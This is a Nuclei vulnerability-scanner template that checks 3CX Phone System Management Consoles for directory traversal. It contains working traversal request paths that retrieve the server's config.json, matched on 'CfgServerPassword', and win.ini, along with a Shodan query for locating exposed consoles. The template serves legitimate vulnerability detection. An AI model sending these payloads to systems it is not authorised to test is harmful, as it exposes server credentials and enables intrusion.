nuclei-templates/vulnerabilities/other/3cx-management-console.yaml

35 lines
939 B
YAML

id: 3cx-management-console
info:
name: 3CX Management Console - Directory Traversal
author: random-robbie
severity: high
description: Directory traversal vulnerability on 3CX Management Console.
reference: https://medium.com/@frycos/pwning-3cx-phone-management-backends-from-the-internet-d0096339dd88
metadata:
shoda-query: http.title:"3CX Phone System Management Console"
tags: 3cx,lfi,voip
requests:
- method: GET
path:
- '{{BaseURL}}/Electron/download/windows/..\..\..\Http\webroot\config.json'
- '{{BaseURL}}/Electron/download/windows/\windows\win.ini'
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: body
words:
- "CfgServerPassword"
- "CfgServerAppName"
condition: and
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and